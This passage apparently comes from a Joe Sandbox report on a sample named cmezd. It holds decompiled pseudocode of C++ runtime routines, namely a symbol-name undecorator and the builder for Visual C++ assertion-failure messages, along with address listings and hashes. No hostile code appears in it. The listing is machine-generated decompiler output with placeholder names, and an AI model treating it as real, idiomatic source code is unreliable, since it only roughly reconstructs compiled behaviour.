				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				void* _t98;
				intOrPtr* _t100;
				void* _t108;
				void* _t122;
				void* _t137;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t147;
				signed char _t151;
				void* _t157;
				intOrPtr* _t158;
				void* _t160;
				void* _t166;
				signed int* _t168;
				intOrPtr _t179;
				void* _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t189;
				unsigned int _t200;
				signed int _t228;
				void* _t247;
				signed int _t251;
				intOrPtr* _t254;
				intOrPtr* _t255;
				void* _t256;
				void* _t257;
				void* _t285;

				_t285 = __fp0;
				_t247 = __edx;
				_t192 =  *0x13a0b18;
				_t257 = _t256 - 0x30;
				_t98 =  *_t192;
				if(_t98 == 0) {
					L51:
					L0135BE7A(_t192, _a4, 1, _a8);
					L52:
					_t100 = _a4;
					L53:
					return _t100;
				}
				if(_t98 < 0x36 || _t98 > 0x39) {
					if(_t98 != 0x5f) {
						goto L50;
					}
					goto L4;
				} else {
					L4:
					_t189 = _t98 - 0x36;
					_t192 = _t192 + 1;
					 *0x13a0b18 = _t192;
					if(_t189 != 0x29) {
						__eflags = _t189;
						if(_t189 < 0) {
							L50:
							_push(2);
							L49:
							E0135B826(_a4);
							goto L52;
						}
						__eflags = _t189 - 3;
						if(__eflags > 0) {
							goto L50;
						}
						L11:
						if(_t189 == 0xffffffff) {
							goto L50;
						}
						_t254 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t254;
						_v8 =  *((intOrPtr*)(_t254 + 4));
						_t251 = _t189 & 0x00000002;
						if(_t251 == 0) {
							L23:
							if((_t189 & 0x00000004) != 0) {
								_t151 =  !( *0x13a0b20 >> 1);
								_t276 = _t151 & 0x00000001;
								_push( &_v52);
								if((_t151 & 0x00000001) == 0) {
									L0135BD7B( &_v12, E0135F18F(_t247, __eflags, _t285));
								} else {
									_t157 = L0135BE4F(_t192,  &_v44, 0x20, E0135F18F(_t247, _t276, _t285));
									_t257 = _t257 + 0x10;
									_t158 = E0135BB4B(_t157,  &_v28,  &_v12);
									_v12 =  *_t158;
									_v8 =  *((intOrPtr*)(_t158 + 4));
								}
							}
							_push( &_v52);
							if(( !( *0x13a0b20 >> 1) & 0x00000001) == 0) {
								_t108 = E0135F36A();
								_t195 =  &_v12;
								L0135BD7B( &_v12, _t108);
							} else {
								_t147 = E0135BB4B(E0135F36A(),  &_v44,  &_v12);
								_t195 =  *_t147;
								_v12 =  *_t147;
								_v8 =  *((intOrPtr*)(_t147 + 4));
							}
							if( *_t254 != 0) {
								_t143 = L0135BE4F(_t195,  &_v52, 0x28,  &_v12);
								_t257 = _t257 + 0xc;
								_t144 = E0135BB6D(_t143,  &_v44, 0x29);
								_v12 =  *_t144;
								_v8 =  *((intOrPtr*)(_t144 + 4));
							}
							_t255 = E0135B660(0x13a0b34, 8);
							if(_t255 == 0) {
								_t255 = 0;
							} else {
								 *_t255 = 0;
								 *((intOrPtr*)(_t255 + 4)) = 0;
							}
							E0135F43F(_t285,  &_v36, _t255);
							E0135BD24( &_v12, E0135BB6D(L0135BE4F(0x13a0b34,  &_v44, 0x28, L01360FC8(_t285,  &_v52)),  &_v28, 0x29));
							_t200 =  *0x13a0b20;
							if((_t200 & 0x00000060) != 0x60 && _t251 != 0) {
								E0135BD24( &_v12,  &_v20);
								_t200 =  *0x13a0b20;
							}
							_push( &_v52);
							if(( !(_t200 >> 0x13) & 0x00000001) == 0) {
								_t122 = L013612B1();
								_t204 =  &_v12;
								L0135BD7B( &_v12, _t122);
							} else {
								_t137 = L013612B1();
								_t204 =  &_v12;
								E0135BD24( &_v12, _t137);
							}
							E0135BD24( &_v12, E0136125D(_t204,  &_v52));
							_push( &_v52);
							if(( !( *0x13a0b20 >> 8) & 0x00000001) == 0) {
								L0135BD7B( &_v12, E0136123A());
							} else {
								E0135BD24( &_v12, E0136123A());
							}
							if(_t255 == 0) {
								_push(3);
								goto L49;
							} else {
								 *_t255 = _v12;
								 *((intOrPtr*)(_t255 + 4)) = _v8;
								_t100 = _a4;
								 *_t100 = _v36;
								 *((intOrPtr*)(_t100 + 4)) = _v32;
								goto L53;
							}
						}
						if( *_t192 == 0x40) {
							_t228 = _t192 + 1;
							__eflags = _t228;
							 *0x13a0b18 = _t228;
						} else {
							_v28 = "::";
							_v24 = 2;
							_t238 = E0135B77F( &_v44,  &_v28);
							E0135BB4B(_t171,  &_v28,  &_v12);
							_v12 = _v28;
							_v8 = _v24;
							if( *( *0x13a0b18) == 0) {
								E0135BB4B(E0135B826( &_v52, 1),  &_v28,  &_v12);
								_v12 = _v28;
								_t179 = _v24;
							} else {
								_t183 = L0135BE4F(_t238,  &_v28, 0x20, L0135CD2F(_t247, _t285,  &_v44));
								_t257 = _t257 + 0x10;
								_t184 = E0135BB4B(_t183,  &_v52,  &_v12);
								_t179 =  *((intOrPtr*)(_t184 + 4));
								_v12 =  *_t184;
							}
							_t228 =  *0x13a0b18;
							_v8 = _t179;
						}
						_t160 =  *_t228;
						if(_t160 == 0) {
							E0135BB4B(E0135B826( &_v52, 1), _a4,  &_v12);
							goto L52;
						} else {
							if(_t160 != 0x40) {
								goto L50;
							}
							 *0x13a0b18 = _t228 + 1;
							_push( &_v52);
							if(( *0x13a0b20 & 0x00000060) == 0x60) {
								_t166 = E0136146B();
								_t192 =  &_v20;
								L0135BD7B( &_v20, _t166);
							} else {
								_t168 = E0136146B();
								_t192 =  *_t168;
								_v20 =  *_t168;
								_v16 = _t168[1];
							}
							goto L23;
						}
					}
					_t185 =  *_t192;
					if(_t185 == 0) {
						goto L51;
					} else {
						_t189 = _t185 - 0x3d;
						_t192 = _t192 + 1;
						 *0x13a0b18 = _t192;
						if(_t189 < 4 || _t189 > 7) {
							_t189 = _t189 | 0xffffffff;
						}
						goto L11;
					}
				}
			}









































                                                                                              0x01360c1e
                                                                                              0x01360c1e
                                                                                              0x01360c21
                                                                                              0x01360c27
                                                                                              0x01360c2a
                                                                                              0x01360c31
                                                                                              0x01360fb0
                                                                                              0x01360fb8
                                                                                              0x01360fc0
                                                                                              0x01360fc0
                                                                                              0x01360fc3
                                                                                              0x01360fc7
                                                                                              0x01360fc7
                                                                                              0x01360c39
                                                                                              0x01360c41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360c47
                                                                                              0x01360c47
                                                                                              0x01360c4a
                                                                                              0x01360c4d
                                                                                              0x01360c4e
                                                                                              0x01360c57
                                                                                              0x01360c7f
                                                                                              0x01360c81
                                                                                              0x01360fac
                                                                                              0x01360fac
                                                                                              0x01360fa2
                                                                                              0x01360fa5
                                                                                              0x00000000
                                                                                              0x01360fa5
                                                                                              0x01360c87
                                                                                              0x01360c8a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360c90
                                                                                              0x01360c93
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360c99
                                                                                              0x01360c9e
                                                                                              0x01360ca2
                                                                                              0x01360ca8
                                                                                              0x01360cae
                                                                                              0x01360cb1
                                                                                              0x01360cb4
                                                                                              0x01360da1
                                                                                              0x01360da4
                                                                                              0x01360dad
                                                                                              0x01360daf
                                                                                              0x01360db4
                                                                                              0x01360db5
                                                                                              0x01360e1f
                                                                                              0x01360db7
                                                                                              0x01360dc3
                                                                                              0x01360dc8
                                                                                              0x01360dd5
                                                                                              0x01360ddf
                                                                                              0x01360de2
                                                                                              0x01360de2
                                                                                              0x01360db5
                                                                                              0x01360e32
                                                                                              0x01360e33
                                                                                              0x01360e57
                                                                                              0x01360e5e
                                                                                              0x01360e61
                                                                                              0x01360e35
                                                                                              0x01360e45
                                                                                              0x01360e4a
                                                                                              0x01360e4f
                                                                                              0x01360e52
                                                                                              0x01360e52
                                                                                              0x01360e6a
                                                                                              0x01360e76
                                                                                              0x01360e7b
                                                                                              0x01360e86
                                                                                              0x01360e90
                                                                                              0x01360e93
                                                                                              0x01360e93
                                                                                              0x01360ea2
                                                                                              0x01360ea6
                                                                                              0x01360eaf
                                                                                              0x01360ea8
                                                                                              0x01360ea8
                                                                                              0x01360eaa
                                                                                              0x01360eaa
                                                                                              0x01360eb6
                                                                                              0x01360ee4
                                                                                              0x01360ee9
                                                                                              0x01360ef6
                                                                                              0x01360f03
                                                                                              0x01360f08
                                                                                              0x01360f08
                                                                                              0x01360f16
                                                                                              0x01360f1a
                                                                                              0x01360f2d
                                                                                              0x01360f34
                                                                                              0x01360f37
                                                                                              0x01360f1c
                                                                                              0x01360f1c
                                                                                              0x01360f23
                                                                                              0x01360f26
                                                                                              0x01360f26
                                                                                              0x01360f4a
                                                                                              0x01360f5e
                                                                                              0x01360f5f
                                                                                              0x01360f7c
                                                                                              0x01360f61
                                                                                              0x01360f6b
                                                                                              0x01360f6b
                                                                                              0x01360f83
                                                                                              0x01360fa0
                                                                                              0x00000000
                                                                                              0x01360f85
                                                                                              0x01360f88
                                                                                              0x01360f8d
                                                                                              0x01360f90
                                                                                              0x01360f96
                                                                                              0x01360f9b
                                                                                              0x00000000
                                                                                              0x01360f9b
                                                                                              0x01360f83
                                                                                              0x01360cbd
                                                                                              0x01360d60
                                                                                              0x01360d60
                                                                                              0x01360d61
                                                                                              0x01360cc3
                                                                                              0x01360cc6
                                                                                              0x01360cd1
                                                                                              0x01360ce5
                                                                                              0x01360ce7
                                                                                              0x01360cef
                                                                                              0x01360cf5
                                                                                              0x01360d00
                                                                                              0x01360d47
                                                                                              0x01360d4f
                                                                                              0x01360d52
                                                                                              0x01360d02
                                                                                              0x01360d12
                                                                                              0x01360d17
                                                                                              0x01360d24
                                                                                              0x01360d2b
                                                                                              0x01360d2e
                                                                                              0x01360d2e
                                                                                              0x01360d55
                                                                                              0x01360d5b
                                                                                              0x01360d5b
                                                                                              0x01360d67
                                                                                              0x01360d6b
                                                                                              0x01360e0b
                                                                                              0x00000000
                                                                                              0x01360d71
                                                                                              0x01360d73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360d82
                                                                                              0x01360d8d
                                                                                              0x01360d8e
                                                                                              0x01360de7
                                                                                              0x01360dee
                                                                                              0x01360df1
                                                                                              0x01360d90
                                                                                              0x01360d90
                                                                                              0x01360d96
                                                                                              0x01360d9b
                                                                                              0x01360d9e
                                                                                              0x01360d9e
                                                                                              0x00000000
                                                                                              0x01360d8e
                                                                                              0x01360d6b
                                                                                              0x01360c59
                                                                                              0x01360c5d
                                                                                              0x00000000
                                                                                              0x01360c63
                                                                                              0x01360c66
                                                                                              0x01360c69
                                                                                              0x01360c6a
                                                                                              0x01360c73
                                                                                              0x01360c7a
                                                                                              0x01360c7a
                                                                                              0x00000000
                                                                                              0x01360c73
                                                                                              0x01360c5d

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
                                                                                              • String ID:
                                                                                              • API String ID: 2932655852-0
                                                                                              • Opcode ID: d816e96588e414d2e6f8e59bd0b0db9b2c310eb956de85b8af6e01f6d2124ae1
                                                                                              • Instruction ID: 81b372c19a64e1c2c14efebf124145b41c4e70b30defff122f5632bd2e9652a8
                                                                                              • Opcode Fuzzy Hash: d816e96588e414d2e6f8e59bd0b0db9b2c310eb956de85b8af6e01f6d2124ae1
                                                                                              • Instruction Fuzzy Hash: 6BC1A571900209AFDB1CDFACD891DEDBBBDBF18708F004159F646A7288DB709A45CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135965F Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 414COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 41%
                                                                                              			E0135965F(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				short _v532;
				intOrPtr* _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				intOrPtr* _v552;
				signed int _v556;
				intOrPtr* _v576;
				intOrPtr* _v580;
				intOrPtr _v584;
				signed int _t78;
				void* _t82;
				void* _t88;
				void* _t89;
				signed int _t93;
				struct HINSTANCE__* _t95;
				intOrPtr _t97;
				void* _t99;
				void* _t100;
				void* _t101;
				intOrPtr _t102;
				void* _t104;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t127;
				intOrPtr _t128;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t136;
				signed int _t137;
				void* _t140;
				void* _t141;
				signed int _t143;
				signed int _t144;
				void* _t146;
				void* _t148;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				intOrPtr _t157;
				intOrPtr* _t159;
				void* _t160;
				void* _t162;
				void* _t164;
				char* _t165;
				void* _t166;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t170;
				intOrPtr* _t173;
				intOrPtr* _t175;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr* _t182;
				void* _t186;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				intOrPtr* _t192;
				void* _t195;
				void* _t196;
				signed int _t197;
				intOrPtr _t199;
				void* _t200;
				signed short* _t202;
				intOrPtr* _t204;
				void* _t205;
				signed int _t206;
				void* _t208;
				void* _t209;
				void* _t211;

				_t172 = __ecx;
				_t78 =  *0x139e210; // 0xbb40e64e
				_v8 = _t78 ^ _t206;
				_push(__ebx);
				_t157 = _a24;
				_push(__esi);
				_t204 = _a4;
				_push(__edi);
				_t199 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t82 = E01367936(_t204, _t199, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t209 = _t208 + 0xc;
				if(_t82 != 0) {
					L64:
					__eflags = 0;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01364C6E();
					asm("int3");
					_push(_t206);
					_push( *_v576);
					_push( *_v580);
					return E0136FC6E(_t172, _t199, _v584);
				} else {
					_push(L"\n\n");
					_push(_t199);
					_t88 = E013678B3(_t204);
					_t209 = _t209 + 0xc;
					if(_t88 != 0) {
						goto L64;
					} else {
						_push( &M0139B818);
						_push(_t199);
						_t89 = E013678B3(_t204);
						_t209 = _t209 + 0xc;
						if(_t89 != 0) {
							goto L64;
						} else {
							E01354D30(_t199,  &_v532, _t89, 0x20a);
							_t211 = _t209 + 0xc;
							_v548 = 0;
							_t93 =  &_v548;
							__imp__GetModuleHandleExW(6, _t157, _t93);
							_t172 =  &_v532;
							asm("sbb eax, eax");
							_t95 =  ~_t93 & _v548;
							_v548 = _t95;
							if(GetModuleFileNameW(_t95,  &_v532, 0x105) != 0) {
								L5:
								_t159 =  &_v532;
								_t173 = _t159;
								_t189 = _t173 + 2;
								do {
									_t97 =  *_t173;
									_t173 = _t173 + 2;
								} while (_t97 != _v540);
								_t172 = _t173 - _t189 >> 1;
								if(_t172 + 0xb <= 0x40) {
									L9:
									_push(_t159);
									_push(_t199);
									_t99 = E013678B3(_t204);
									_t209 = _t211 + 0xc;
									if(_t99 != 0) {
										goto L64;
									} else {
										_push("\n");
										_push(_t199);
										_t100 = E013678B3(_t204);
										_t209 = _t209 + 0xc;
										if(_t100 != 0) {
											goto L64;
										} else {
											_push(L"File: ");
											_push(_t199);
											_t101 = E013678B3(_t204);
											_t209 = _t209 + 0xc;
											if(_t101 != 0) {
												goto L64;
											} else {
												_t190 = _v536;
												_t175 = _t190;
												_t160 = _t175 + 2;
												do {
													_t102 =  *_t175;
													_t175 = _t175 + 2;
												} while (_t102 != _v540);
												_t172 = _t175 - _t160 >> 1;
												if((_t175 - _t160 >> 1) + 8 <= 0x40) {
													_push(_t190);
													goto L33;
												} else {
													_t167 = _t190;
													_t186 = _t167 + 2;
													do {
														_t128 =  *_t167;
														_t167 = _t167 + 2;
													} while (_t128 != _v540);
													_v544 = 0x5c;
													_t169 = _t167 - _t186 >> 1;
													_t172 = 1;
													_t129 =  *(_t190 + _t169 * 2 - 2) & 0x0000ffff;
													if(_t129 != _v544) {
														_v556 = _t129;
														_t202 = _t190 - 2 + _t169 * 2;
														_t197 = _t129;
														while(_t197 != 0x2f && _t172 < _t169) {
															_t202 = _t202 - 2;
															_t172 = _t172 + 1;
															_t151 =  *_t202 & 0x0000ffff;
															_t197 = _t151;
															if(_t151 != _v544) {
																continue;
															}
															break;
														}
														_t199 = _a8;
														_t190 = _v536;
													}
													_t131 = _t169 - _t172;
													_v544 = _t131;
													if(_t131 <= 0x26) {
														if(__eflags >= 0) {
															goto L56;
														} else {
															_t141 = 0x35;
															_t172 = _t172 >> 1;
															_v556 = _t172;
															_push(_t141 - _t172);
															_t143 = E013679FE(_t172, _t204, _t199, _t190);
															_t209 = _t209 + 0x10;
															__eflags = _t143;
															if(_t143 != 0) {
																goto L64;
															} else {
																_push(L"...");
																_push(_t199);
																_t144 = E013678B3(_t204);
																_t209 = _t209 + 0xc;
																__eflags = _t144;
																if(_t144 != 0) {
																	goto L64;
																} else {
																	_t170 = _t169 - _v556;
																	__eflags = _t170;
																	_t140 = _v536 + _t170 * 2;
																	goto L32;
																}
															}
														}
													} else {
														if(_t172 >= 0x12) {
															L56:
															_push(0x23);
															_t132 = E013679FE(_t172, _t204, _t199, _t190);
															_t209 = _t209 + 0x10;
															__eflags = _t132;
															if(_t132 != 0) {
																goto L64;
															} else {
																_push(L"...");
																_push(_t199);
																_t133 = E013678B3(_t204);
																_t209 = _t209 + 0xc;
																__eflags = _t133;
																if(_t133 != 0) {
																	goto L64;
																} else {
																	_t172 = _v544;
																	_push(8);
																	_t136 = E013679FE(_v544, _t204, _t199, _v536 + _v544 * 2);
																	_t209 = _t209 + 0x10;
																	__eflags = _t136;
																	if(_t136 != 0) {
																		goto L64;
																	} else {
																		_push(L"...");
																		_push(_t199);
																		_t137 = E013678B3(_t204);
																		_t209 = _t209 + 0xc;
																		__eflags = _t137;
																		if(_t137 != 0) {
																			goto L64;
																		} else {
																			_t140 = _v536 + _t169 * 2 + 0xfffffff2;
																			goto L32;
																		}
																	}
																}
															}
														} else {
															_t146 = 0x35;
															_push(_t146 - _t172);
															_t148 = E013679FE(_t172, _t204, _t199, _t190);
															_t209 = _t209 + 0x10;
															if(_t148 != 0) {
																goto L64;
															} else {
																_push(L"...");
																_push(_t199);
																_t149 = E013678B3(_t204);
																_t209 = _t209 + 0xc;
																if(_t149 != 0) {
																	goto L64;
																} else {
																	_t172 = _v544;
																	_t140 = _v536 + _v544 * 2;
																	L32:
																	_push(_t140);
																	L33:
																	_push(_t199);
																	_t104 = E013678B3(_t204);
																	_t209 = _t209 + 0xc;
																	if(_t104 != 0) {
																		goto L64;
																	} else {
																		_push("\n");
																		_push(_t199);
																		_t105 = E013678B3(_t204);
																		_t209 = _t209 + 0xc;
																		if(_t105 != 0) {
																			goto L64;
																		} else {
																			_push(L"Line: ");
																			_push(_t199);
																			_t106 = E013678B3(_t204);
																			_t209 = _t209 + 0xc;
																			if(_t106 != 0) {
																				goto L64;
																			} else {
																				_t177 = _t204;
																				_t191 = _t177 + 2;
																				do {
																					_t107 =  *_t177;
																					_t177 = _t177 + 2;
																				} while (_t107 != 0);
																				_t192 = _t204;
																				_t172 = _t177 - _t191 >> 1;
																				_t162 = _t192 + 2;
																				do {
																					_t108 =  *_t192;
																					_t192 = _t192 + 2;
																				} while (_t108 != _v540);
																				_t112 = E0137033D(_t172, _a20, _t204 + (_t192 - _t162 >> 1) * 2, _t199 - _t172, 0xa);
																				_t209 = _t209 + 0x10;
																				if(_t112 != 0) {
																					goto L64;
																				} else {
																					_push(L"\n\n");
																					_push(_t199);
																					_t113 = E013678B3(_t204);
																					_t209 = _t209 + 0xc;
																					if(_t113 != 0) {
																						goto L64;
																					} else {
																						_push(L"Expression: ");
																						_push(_t199);
																						_t114 = E013678B3(_t204);
																						_t209 = _t209 + 0xc;
																						if(_t114 != 0) {
																							goto L64;
																						} else {
																							_t179 = _t204;
																							_t195 = _t179 + 2;
																							do {
																								_t115 =  *_t179;
																								_t179 = _t179 + 2;
																							} while (_t115 != 0);
																							_t196 = (_t179 - _t195 >> 1) + 0xb0;
																							_t182 = _v552;
																							_t164 = _t182 + 2;
																							do {
																								_t116 =  *_t182;
																								_t182 = _t182 + 2;
																							} while (_t116 != _v540);
																							_t172 = _t182 - _t164 >> 1;
																							if((_t182 - _t164 >> 1) + _t196 <= _t199) {
																								_push(_v552);
																								goto L50;
																							} else {
																								_push(_t199 - _t196 - 3);
																								_t127 = E013679FE(_t172, _t204, _t199, _v552);
																								_t209 = _t209 + 0x10;
																								if(_t127 != 0) {
																									goto L64;
																								} else {
																									_push(L"...");
																									L50:
																									_push(_t199);
																									_t118 = E013678B3(_t204);
																									_t209 = _t209 + 0xc;
																									if(_t118 != 0) {
																										goto L64;
																									} else {
																										_t165 = L"\n\n";
																										_push(_t165);
																										_push(_t199);
																										_t119 = E013678B3(_t204);
																										_t209 = _t209 + 0xc;
																										if(_t119 != 0) {
																											goto L64;
																										} else {
																											_push(L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_push(_t199);
																											_t120 = E013678B3(_t204);
																											_t209 = _t209 + 0xc;
																											if(_t120 != 0) {
																												goto L64;
																											} else {
																												_push(_t165);
																												_push(_t199);
																												_t121 = E013678B3(_t204);
																												_t209 = _t209 + 0xc;
																												if(_t121 != 0) {
																													goto L64;
																												} else {
																													_push(L"(Press Retry to debug the application - JIT must be enabled)");
																													_push(_t199);
																													_t122 = E013678B3(_t204);
																													_t209 = _t209 + 0xc;
																													if(_t122 != 0) {
																														goto L64;
																													} else {
																														_pop(_t200);
																														_pop(_t205);
																														_pop(_t166);
																														return L01353E0D(_t122, _t166, _v8 ^ _t206, _t196, _t200, _t205);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t152 = _t172 * 2 - 0x6a;
									_t172 = 0x20a - _t152;
									_t159 =  &_v532 + _t152;
									_t153 = E01358BD5(_t159, 0x20a - _t152, L"...", 6);
									_t209 = _t211 + 0x10;
									if(_t153 != 0) {
										goto L64;
									} else {
										goto L9;
									}
								}
							} else {
								_t155 = E01367936( &_v532, 0x105, L"<program name unknown>");
								_t209 = _t211 + 0xc;
								if(_t155 != 0) {
									goto L64;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}



























































































                                                                                              0x0135965f
                                                                                              0x0135966a
                                                                                              0x01359671
                                                                                              0x01359677
                                                                                              0x01359678
                                                                                              0x0135967b
                                                                                              0x0135967c
                                                                                              0x0135967f
                                                                                              0x01359680
                                                                                              0x01359688
                                                                                              0x01359693
                                                                                              0x01359699
                                                                                              0x0135969e
                                                                                              0x013596a5
                                                                                              0x013596aa
                                                                                              0x01359b34
                                                                                              0x01359b34
                                                                                              0x01359b36
                                                                                              0x01359b37
                                                                                              0x01359b38
                                                                                              0x01359b39
                                                                                              0x01359b3a
                                                                                              0x01359b3b
                                                                                              0x01359b40
                                                                                              0x01359b43
                                                                                              0x01359b49
                                                                                              0x01359b4e
                                                                                              0x01359b5c
                                                                                              0x013596b0
                                                                                              0x013596b0
                                                                                              0x013596b5
                                                                                              0x013596b7
                                                                                              0x013596bc
                                                                                              0x013596c1
                                                                                              0x00000000
                                                                                              0x013596c7
                                                                                              0x013596c7
                                                                                              0x013596cc
                                                                                              0x013596ce
                                                                                              0x013596d3
                                                                                              0x013596d8
                                                                                              0x00000000
                                                                                              0x013596de
                                                                                              0x013596eb
                                                                                              0x013596f0
                                                                                              0x013596f5
                                                                                              0x013596fb
                                                                                              0x01359705
                                                                                              0x0135970d
                                                                                              0x01359719
                                                                                              0x0135971b
                                                                                              0x01359723
                                                                                              0x01359731
                                                                                              0x01359750
                                                                                              0x01359750
                                                                                              0x01359756
                                                                                              0x01359758
                                                                                              0x0135975b
                                                                                              0x0135975b
                                                                                              0x0135975e
                                                                                              0x01359761
                                                                                              0x0135976c
                                                                                              0x01359774
                                                                                              0x013597a5
                                                                                              0x013597a5
                                                                                              0x013597a6
                                                                                              0x013597a8
                                                                                              0x013597ad
                                                                                              0x013597b2
                                                                                              0x00000000
                                                                                              0x013597b8
                                                                                              0x013597b8
                                                                                              0x013597bd
                                                                                              0x013597bf
                                                                                              0x013597c4
                                                                                              0x013597c9
                                                                                              0x00000000
                                                                                              0x013597cf
                                                                                              0x013597cf
                                                                                              0x013597d4
                                                                                              0x013597d6
                                                                                              0x013597db
                                                                                              0x013597e0
                                                                                              0x00000000
                                                                                              0x013597e6
                                                                                              0x013597e6
                                                                                              0x013597ec
                                                                                              0x013597ee
                                                                                              0x013597f1
                                                                                              0x013597f1
                                                                                              0x013597f4
                                                                                              0x013597f7
                                                                                              0x01359802
                                                                                              0x0135980a
                                                                                              0x01359b14
                                                                                              0x00000000
                                                                                              0x01359810
                                                                                              0x01359810
                                                                                              0x01359812
                                                                                              0x01359815
                                                                                              0x01359815
                                                                                              0x01359818
                                                                                              0x0135981b
                                                                                              0x01359826
                                                                                              0x01359830
                                                                                              0x01359834
                                                                                              0x01359835
                                                                                              0x01359841
                                                                                              0x01359846
                                                                                              0x0135984c
                                                                                              0x0135984f
                                                                                              0x01359851
                                                                                              0x0135985b
                                                                                              0x0135985e
                                                                                              0x0135985f
                                                                                              0x01359862
                                                                                              0x0135986b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135986b
                                                                                              0x0135986d
                                                                                              0x01359870
                                                                                              0x01359870
                                                                                              0x01359878
                                                                                              0x0135987a
                                                                                              0x01359883
                                                                                              0x013598cf
                                                                                              0x00000000
                                                                                              0x013598d5
                                                                                              0x013598d7
                                                                                              0x013598d8
                                                                                              0x013598dc
                                                                                              0x013598e2
                                                                                              0x013598e6
                                                                                              0x013598eb
                                                                                              0x013598ee
                                                                                              0x013598f0
                                                                                              0x00000000
                                                                                              0x013598f6
                                                                                              0x013598f6
                                                                                              0x013598fb
                                                                                              0x013598fd
                                                                                              0x01359902
                                                                                              0x01359905
                                                                                              0x01359907
                                                                                              0x00000000
                                                                                              0x0135990d
                                                                                              0x0135990d
                                                                                              0x0135990d
                                                                                              0x01359919
                                                                                              0x00000000
                                                                                              0x01359919
                                                                                              0x01359907
                                                                                              0x013598f0
                                                                                              0x01359885
                                                                                              0x01359888
                                                                                              0x01359aac
                                                                                              0x01359aac
                                                                                              0x01359ab1
                                                                                              0x01359ab6
                                                                                              0x01359ab9
                                                                                              0x01359abb
                                                                                              0x00000000
                                                                                              0x01359abd
                                                                                              0x01359abd
                                                                                              0x01359ac2
                                                                                              0x01359ac4
                                                                                              0x01359ac9
                                                                                              0x01359acc
                                                                                              0x01359ace
                                                                                              0x00000000
                                                                                              0x01359ad0
                                                                                              0x01359ad0
                                                                                              0x01359adc
                                                                                              0x01359ae4
                                                                                              0x01359ae9
                                                                                              0x01359aec
                                                                                              0x01359aee
                                                                                              0x00000000
                                                                                              0x01359af0
                                                                                              0x01359af0
                                                                                              0x01359af5
                                                                                              0x01359af7
                                                                                              0x01359afc
                                                                                              0x01359aff
                                                                                              0x01359b01
                                                                                              0x00000000
                                                                                              0x01359b03
                                                                                              0x01359b0c
                                                                                              0x00000000
                                                                                              0x01359b0c
                                                                                              0x01359b01
                                                                                              0x01359aee
                                                                                              0x01359ace
                                                                                              0x0135988e
                                                                                              0x01359890
                                                                                              0x01359893
                                                                                              0x01359897
                                                                                              0x0135989c
                                                                                              0x013598a1
                                                                                              0x00000000
                                                                                              0x013598a7
                                                                                              0x013598a7
                                                                                              0x013598ac
                                                                                              0x013598ae
                                                                                              0x013598b3
                                                                                              0x013598b8
                                                                                              0x00000000
                                                                                              0x013598be
                                                                                              0x013598c4
                                                                                              0x013598ca
                                                                                              0x0135991c
                                                                                              0x0135991c
                                                                                              0x0135991d
                                                                                              0x0135991d
                                                                                              0x0135991f
                                                                                              0x01359924
                                                                                              0x01359929
                                                                                              0x00000000
                                                                                              0x0135992f
                                                                                              0x0135992f
                                                                                              0x01359934
                                                                                              0x01359936
                                                                                              0x0135993b
                                                                                              0x01359940
                                                                                              0x00000000
                                                                                              0x01359946
                                                                                              0x01359946
                                                                                              0x0135994b
                                                                                              0x0135994d
                                                                                              0x01359952
                                                                                              0x01359957
                                                                                              0x00000000
                                                                                              0x0135995d
                                                                                              0x0135995d
                                                                                              0x01359961
                                                                                              0x01359964
                                                                                              0x01359964
                                                                                              0x01359967
                                                                                              0x0135996a
                                                                                              0x01359971
                                                                                              0x01359973
                                                                                              0x01359975
                                                                                              0x01359978
                                                                                              0x01359978
                                                                                              0x0135997b
                                                                                              0x0135997e
